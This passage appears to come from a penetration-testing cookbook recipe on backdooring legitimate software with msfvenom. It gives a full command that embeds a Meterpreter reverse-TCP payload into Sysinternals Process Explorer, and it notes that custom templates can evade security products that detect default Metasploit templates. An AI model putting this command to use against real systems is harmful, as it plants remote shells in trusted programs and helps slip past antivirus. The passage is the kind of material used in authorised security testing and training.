Backdooring known applications can be a good way to compromise a target, for example, when you are already on the internal network and get access to the internal software repository. Also, by using a custom template, you may be able to bypass some security solutions that are using the default template to detect Metasploit payloads.
MSFvenom, by default, uses the templates in the /usr/share/metasploit-framework/data/templates
directory, but we can choose to use our own, using the -x
option.
- Using the
-x
option, we can specify our own template; in this recipe we will use Process Explorer from Windows Sysinternals, and, by using the-k
option, we can run your payload as a new thread from the template:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -x procexp.exe -k -f exe -o procexp-backdoored.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload...